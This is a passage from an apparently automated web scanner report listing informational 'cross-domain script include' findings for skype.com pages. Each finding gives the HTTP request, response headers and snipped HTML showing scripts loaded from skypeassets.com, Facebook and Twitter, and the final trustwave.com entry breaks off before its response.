<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.892. http://www.skype.com/intl/en/prices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42062


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Cheap Calls and Group Video Calls with Skype - Skype</title>
   <meta name="description" cont
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.893. http://www.skype.com/intl/en/prices/pay-monthly  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/pay-monthly

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/pay-monthly HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:04 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 84688


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >

<head>
   
   <tit
...[SNIP]...
</script>

   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake_subscriptions.css" type="text/css" media="screen"/>
   
   <script src="http://www.skypeassets.com/i/js/wanalytics/wa-subs2.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/complete_subscriptions.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.894. http://www.skype.com/intl/en/prices/pay-monthly/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/pay-monthly/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/pay-monthly/?intcmp=search-sub HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://search2.skype.com/search/search.cgi?query=xss&collection=skype-en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.skype.com
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:06:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 84688
Content-Type: text/html; charset=utf-8
Content-Language: en


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >

<head>
   
   <tit
...[SNIP]...
</script>

   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake_subscriptions.css" type="text/css" media="screen"/>
   
   <script src="http://www.skypeassets.com/i/js/wanalytics/wa-subs2.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/complete_subscriptions.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.895. http://www.skype.com/intl/en/prices/payg-rates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/payg-rates

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/payg-rates HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:04 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 242501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.896. http://www.skype.com/intl/en/prices/payg-rates/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/payg-rates/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/payg-rates/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 242501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.897. http://www.skype.com/intl/en/prices/premium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/premium

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/premium?intcmp=CS-Upsell-RightNav-FA10184 HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49170


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Premium - Buy enhanced access to Skype features - Skype</title>
   <meta name="descript
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.898. http://www.skype.com/intl/en/prices/premium/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/premium/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/premium/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49170


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Premium - Buy enhanced access to Skype features - Skype</title>
   <meta name="descript
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.899. http://www.skype.com/intl/en/prices/skype-credit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/skype-credit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/skype-credit HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.900. http://www.skype.com/intl/en/prices/skype-credit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/skype-credit/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/skype-credit/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.901. http://www.skype.com/intl/en/prices/sms-rates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/sms-rates

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/sms-rates HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 129018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   <script src="http://www.skypeassets.com/i/js/jquery/jquery.autocomplete.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.902. http://www.skype.com/intl/en/prices/sms-rates/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/sms-rates/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/sms-rates/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 129018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   <script src="http://www.skypeassets.com/i/js/jquery/jquery.autocomplete.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.903. http://www.skype.com/intl/en/prices/subscriptions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/subscriptions/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/subscriptions/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 82008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >

<head>
   
   <title>
...[SNIP]...
</script>

   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/remake_subscriptions.css" type="text/css" media="screen"/>
   
   <script src="http://www.skypeassets.com/i/js/wanalytics/wa-subs2.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/complete_subscriptions.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.904. http://www.skype.com/intl/en/prices/ways-to-pay/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/prices/ways-to-pay/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/prices/ways-to-pay/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:07 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 52848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script charset="utf-8" src="http://www.skypeassets.com/i/js/animation.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/language-annoyance.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.905. http://www.skype.com/intl/en/special-offers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/special-offers

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/special-offers HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47157


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Special offers on Skype Credit and accessories - Skype</title>
   <meta name="description" co
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>


           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>

<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.906. http://www.skype.com/intl/en/special-offers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en/special-offers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en/special-offers/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:12 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47157


<!DOCTYPE html>
<html lang="en" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Special offers on Skype Credit and accessories - Skype</title>
   <meta name="description" co
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>


           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>

<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a>
           <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.907. http://www.skype.com/products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /products

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:40:33 GMT
Server: Apache
X-Handler: 404.php
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 36319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

   
   <titl
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.908. https://www.trustwave.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustwave.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.trustwave.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3f8jad7n25ekrcbukulr2hcf12

Response

